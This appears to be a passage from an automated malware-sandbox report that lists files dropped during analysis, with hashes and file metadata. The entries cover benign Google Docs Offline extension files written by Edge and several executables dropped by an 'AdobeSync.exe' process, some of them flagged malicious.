                                                                                                                                                                                                                                                                                                SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                                SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1333
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                                MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                                SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                                SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                                SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1263
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                                MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                                SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                                SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                                SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1074
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                                MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                                SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                                SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                                SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):879
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                                MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                                SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                                SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                                SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1205
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                                SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):843
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                                SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):912
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):11406
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                                MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                                SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                                SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                                SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):854
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2525
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                                MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                                SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                                SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                                SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):97
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):122218
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                                MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                                SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                                SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                                SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):291
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):130866
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                                MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                                SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                                SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                                SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):168960
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.635989544957891
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:mm3ITKGHS4tcdKwmcOTw1hOqLKpJzadzwxxYBcdgNqbeBTg4vRPzr4zvRjN:mVTxS4tcdKVw1iB8AxrGqG4J
                                                                                                                                                                                                                                                                                                MD5:77610CBDCAC173785E2FB18CCB522574
                                                                                                                                                                                                                                                                                                SHA1:315E7DE9D5DA5C13364D6A5E90C7EFF80A15DA48
                                                                                                                                                                                                                                                                                                SHA-256:40CE54280DBA1A8F029F4A8AFDD19F5D898CE4A221104ED6F9B0F619D54F912F
                                                                                                                                                                                                                                                                                                SHA-512:AA81C82F122D75B3DCA6993A69C051779F9E63E1006E1B3AAB3C6E1A82AF66BBB100CF091A160049C6B041E53ADA6AF71033FC23ED1EA8888F9F3C161FA11206
                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1219488
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.312582930861741
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24576:+heavSigvk0vhkzswHD4/V3OQdnYKYc4wXUyuy1:qP710vezrj4dJYFYUyuy1
                                                                                                                                                                                                                                                                                                MD5:F778E9136AB0DB9DE9802A7043DE50A7
                                                                                                                                                                                                                                                                                                SHA1:850DCA074534A14FDB9ADA6AFACEEA88558764E0
                                                                                                                                                                                                                                                                                                SHA-256:90803A583E9F693DE5E7B8A196832436F6F648B27FB82E55904C256F30CC8B3A
                                                                                                                                                                                                                                                                                                SHA-512:CD6C5C3537F05AD5826D503E38B8E6EF2EAF668616BEC15BA51AD3D81E0337A72779D7CA6AF9E8EBEE12D713891B30C0B73BF34718552BC9F4E7D8909B998156
                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):110472
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.411600464209584
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:FeQixAO/A/0VSaGHvP5GeBTEpP2t31VrxrcZ0KOKbfQp:uKO+0VSnKOKbop
                                                                                                                                                                                                                                                                                                MD5:759D71FC9442AB5A9B5749C0F6C0C263
                                                                                                                                                                                                                                                                                                SHA1:07A68C6922D443EB9D6D445DA18AE8A6D92F7AC6
                                                                                                                                                                                                                                                                                                SHA-256:109647F58E7E8386A4C025F2C8175A4D638E5C0E62768953390764010EA22A2E
                                                                                                                                                                                                                                                                                                SHA-512:E3EFE66C76EA81285BA01B1978FDB3E807EB0BF2CFE0373BB6FEF06F2FD7D9DDC3269ACF0D87517CBF9BEA5FA09B2703A03792491DC8265D26B724D7DCA106C7
                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):62969
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.539146899101455
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:wtVMpSzCLmJZriRxBfJJXWT/5F0Oy+loZ:wvuSJhEHfJJGT/5F0v+SZ
                                                                                                                                                                                                                                                                                                MD5:9076AB572C60AAB6B113F4F9108A9CC8
                                                                                                                                                                                                                                                                                                SHA1:1439248640CE9418B5BA13862160DFA00364390B
                                                                                                                                                                                                                                                                                                SHA-256:1E5750FFBDC77FCE17521A2EF5754A998B002A87E9036B1157FC2A63DD91C30D
                                                                                                                                                                                                                                                                                                SHA-512:B42B6162930A5CB9B0FEBC5CE1C6FD5EEF7B02AD041C302820541968EE5FFF1B779D60BDC458B5539B9AEF2F9169F493392A8CD819F435F10D71941A55761287
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4526833
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.959653744732072
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:98304:9M79mFIVQgIBckuHqM4KVqnl8dAQiORny+fRt:91MQgIBcksVqKdALO9t
